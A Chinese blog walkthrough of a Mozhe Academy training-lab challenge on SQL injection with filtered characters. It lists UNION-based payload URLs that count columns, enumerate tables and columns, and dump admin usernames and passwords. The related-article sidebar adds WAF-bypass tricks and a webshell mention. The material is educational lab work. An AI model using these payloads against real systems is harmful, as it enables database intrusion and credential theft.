墨者学院-----SQL过滤字符后手工注入漏洞测试(第3题)

最新推荐文章于 2022-03-20 00:13:51 发布
最新推荐文章于 2022-03-20 00:13:51 发布
阅读量249 收藏
点赞数
分类专栏: 墨者学院靶场 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43590351/article/details/112974559
版权

SQL过滤字符后手工注入漏洞测试(第3题)

在这里插入图片描述

按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常
此url种存在着字符型注入
第一步判断字段数
利用order by进行判断,发现字段数是7

?id=1' order by 7 --+

查找回显点

?id=-1' union select 1,2,3,4,5,6, 7 --+

http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+
都是回显点
在这里插入图片描述
关键字也没被过滤,按照流程步骤一步一步进行爆破

爆库 min_ju4t_mel1i
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,database(),3,4,5,6, 7 --+

爆破表 (@dmin9_td4b},notice, stormgroup_member tdb_goods
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(table_name),3,4,5,6, 7 from information_schema.tables where table_schema = database()–+

爆破字段 id, username, password, status
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(column_name),3,4,5,6, 7 from information_schema.columns where table_schema = database() and table_name = ‘(@dmin9_td4b}’ --+

爆字段值
http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,group_concat(username),group_concat(password),group_concat(status),group_concat(id),6,7 from (@dmin9_td4b}–+
注意其中表名被反单引号包裹,英文状态下tap键
根据status状态码,找到用户名密码即可

萌新_大鹏鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 365
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者SQL过滤字符手工注入漏洞测试(第3)
wswr的博客
03-18 917
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
墨者学院SQL过滤字符手工注入漏洞测试(第3)
没事我溜达
03-20 3035
靶场地址:SQL过滤字符手工注入漏洞测试(第3)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 我们进入靶场(这次总算是不一样的了) 首先判断注入 我们在后面加入一个单引号,发现页面报错 能做到这个靶场的都不是新手,我就不说为什么报错了,我们在后面加上注释符,即可完成闭合,使得页面显示正常 然后order by判断列数,在第8列页面不回显,那么判断数据库有7列数据 判断回显位置 查询数据库名 http://1...
墨者学院 SQL过滤字符手工注入漏洞测试(第3)
a519395243的博客
12-21 1429
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2669
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
mogan-main.zip
12-28
墨干编辑器是墨者实验室旗下的结构化编辑器。让我们享受探索科学与技术的乐趣!
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3229
很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
多崎巡礼的博客
08-20 3199
postgreSQL注入mysql注入语法是类似的,有一点小的差异: postgreSQL查询当前数据库使用:current_database()函数; 在pg_stat_user_tables库查询表名,使用relname关键字; 和MySQL的limit使用有差异,语法为limit 1 offset 0。     手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
多崎巡礼的博客
08-20 1677
  网站公告存在注入点   ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1 ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg      ...
SQL注入1
慢慢变小佬的博客
07-06 751
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
MYSQL-手工SQL注入绕过技巧-实战篇
eT48_Sec
12-24 5913
之前遇到一个站点,经检测存在SQL注入,但是有WAF存在,后来知道是绿盟的WEB应用防火墙。 后来在社区看到了一篇关于《sql注入绕过技巧》的文章后(原文:http://zone.wooyun.org/content/16772),回过头来重新进行手工,这次总算干掉了WAF。以下是自己对于本次渗透的一些学习笔记,包含一些绕过waf的技巧。 首先判断注入点 id=161-(select
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 740
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   <?php...
墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)
多崎巡礼的博客
08-16 2042
# 查看是否有注入点 http://ip/new_list.php?id=1' # 想办法闭合语句,查看所有集合 # db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写 http://ip/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()...
墨者 - SQL过滤字符手工注入漏洞测试(第2)
吃肉唐僧的博客
07-11 627
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
mysql oder by 注入_Order by排序注入方法小总结
weixin_28753647的博客
02-07 1013
今天总结一下注入点在order by排序注入,学习一下记录下这个过程声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负!注入方法介绍当页面出现mysql报错信息时,注入点在 order by后面,此时可以利用报错信息进行注入。正常语句mysql> select * from users order by id;+----+----------+------------+| id ...
墨者-sql手工注入漏洞测试
最新发布
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值